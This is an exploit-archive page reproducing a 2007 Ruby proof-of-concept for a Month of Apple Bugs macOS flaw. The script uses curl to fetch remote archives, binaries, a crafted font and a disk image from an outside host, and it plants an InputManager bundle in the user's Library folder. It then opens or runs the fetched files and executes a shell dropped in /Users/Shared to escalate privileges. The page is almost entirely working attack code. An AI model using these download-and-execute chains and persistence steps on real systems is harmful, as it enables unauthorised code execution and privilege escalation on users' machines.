Home / exploitsPDF  

MOAB-22-01-2007.rb.txt

Posted on 24 January 2007

#!/usr/bin/ruby # Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com> # Lance M. Havok <lmh [at] info-pull.com> # All pwnage reserved. # # "Exploit" for MOAB-22-01-2007: All your crash are belong to us. # require 'fileutils' bugselected = (ARGV[0] || 0).to_i INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz" INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" + "mkdir -p ~/Library/InputManagers/;" + "cd ~/Library/InputManagers/;" + "tar -zxvf /tmp/moab_im.tar.gz" case bugselected when 0 target_url = "http://projects.info-pull.com/moab/bug-files/notification" trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &" when 1 target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf" trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf" when 2 target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz" trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg" end CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}" def escalate() puts "++ Welcome to Pwndertino..." system CMD_LINE sleep 5 system "/Users/Shared/shX" end escalate()

 

TOP